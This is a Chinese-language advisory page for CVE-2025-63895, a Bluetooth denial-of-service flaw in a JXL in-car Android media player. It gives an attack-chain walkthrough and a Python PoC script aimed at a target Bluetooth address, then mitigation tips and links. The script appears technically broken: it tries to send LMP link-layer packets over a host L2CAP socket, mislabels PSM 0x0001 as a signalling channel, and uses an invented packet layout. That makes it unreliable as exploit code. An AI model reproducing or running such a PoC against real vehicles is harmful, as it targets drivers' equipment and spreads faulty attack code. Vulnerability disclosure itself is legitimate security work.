JXL 9寸车载安卓播放器蓝牙固件LMP数据包DoS漏洞 (CVE-2025-63895)

漏洞信息

漏洞编号

CVE-2025-63895

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

JXL 9 Inch Car Android Double Din Player Android v12.0

漏洞概述

JXL 9寸车载安卓播放器在Android v12.0系统中存在蓝牙固件安全漏洞。该漏洞源于蓝牙固件对Link Manager Protocol (LMP)数据包的验证不足，攻击者可通过发送精心构造的恶意LMP数据包触发设备蓝牙模块异常，导致车载娱乐系统服务中断。此漏洞无需认证即可利用，攻击者可远程触发设备拒绝服务状态，影响车载系统的正常使用。由于该设备应用于汽车环境，DoS攻击可能导致驾驶员注意力分散，在行驶过程中造成安全隐患。

技术细节

该漏洞存在于JXL车载娱乐系统的蓝牙固件层，具体为LMP（链路管理器协议）处理模块。当设备蓝牙处于开启状态时，攻击者可以发送特制的LMP数据包，该数据包包含异常字段值或非法参数。固件在解析这些恶意数据包时未能正确处理边界条件，导致内存处理错误或程序逻辑异常，最终造成蓝牙模块崩溃或系统无响应。攻击者无需与目标设备配对即可发起攻击，攻击复杂度低。由于蓝牙通信范围通常在10米以内，攻击需要在物理 proximity 范围内进行。

攻击链分析

STEP 1

步骤1

扫描范围内开启蓝牙的JXL车载娱乐系统设备

STEP 2

步骤2

识别目标设备蓝牙MAC地址，建立L2CAP连接

STEP 3

步骤3

发送特制的恶意LMP数据包，包含异常字段值

STEP 4

步骤4

蓝牙固件解析恶意数据包时触发内存错误

STEP 5

步骤5

蓝牙模块崩溃，设备进入拒绝服务状态

STEP 6

步骤6

车载娱乐系统功能中断，需重启恢复

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-63895 PoC - JXL Car Media Player Bluetooth DoS
# Description: Send crafted LMP packet to trigger DoS on JXL Bluetooth firmware

import struct
import socket
import sys

def create_crafted_lmp_packet():
    """Create a malformed LMP packet to trigger vulnerability"""
    # LMP opcode for feature request (0x01) - can be modified
    lmp_opcode = 0x01
    
    # Create LMP PDU header
    # LMP format: Company ID (3 bytes) + Opcode + Payload
    company_id = 0x00001F  # Bluetooth SIG assigned company ID
    
    # Crafted payload with invalid parameters
    # This triggers buffer/process error in firmware
    payload = bytes([
        0xFF, 0xFF, 0xFF, 0xFF,  # Invalid feature mask
        0x00, 0x00, 0x00, 0x00   # Additional malformed data
    ])
    
    # Construct LMP packet
    lmp_packet = struct.pack('>I', company_id)[1:]  # 3 bytes company ID
    lmp_packet += bytes([lmp_opcode])
    lmp_packet += payload
    
    return lmp_packet

def send_bluetooth_dos(target_bdaddr, lmp_packet):
    """Send crafted LMP packet via Bluetooth L2CAP connection"""
    try:
        # Create Bluetooth socket
        sock = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_L2CAP)
        sock.connect((target_bdaddr, 0x0001))  # L2CAP Signalling Channel
        
        # Send crafted LMP packet
        sock.send(lmp_packet)
        sock.close()
        
        print(f"[+] Crafted LMP packet sent to {target_bdaddr}")
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_bluetooth_address>")
        print(f"Example: {sys.argv[0]} AA:BB:CC:DD:EE:FF")
        sys.exit(1)
    
    target = sys.argv[1]
    packet = create_crafted_lmp_packet()
    print(f"[*] Sending crafted LMP packet to trigger CVE-2025-63895...")
    send_bluetooth_dos(target, packet)

影响范围

JXL 9 Inch Car Android Double Din Player Android v12.0

防御指南

临时缓解措施

在官方修复发布前，建议在车辆停放不使用时关闭车载娱乐系统的蓝牙功能，并限制陌生设备的蓝牙配对请求。如需在公共停车场等环境下保护车辆，应使用物理屏蔽措施减少蓝牙信号暴露。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-63895
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-63895
3 Details https://www.cvedetails.com/cve/CVE-2025-63895/
4 VulDB https://vuldb.com/cve/CVE-2025-63895
5 Link http://jxl.com
6 Link https://github.com/thorat-shubham/JXL_Infotainment_CVE-2025-63895/blob/main/README.md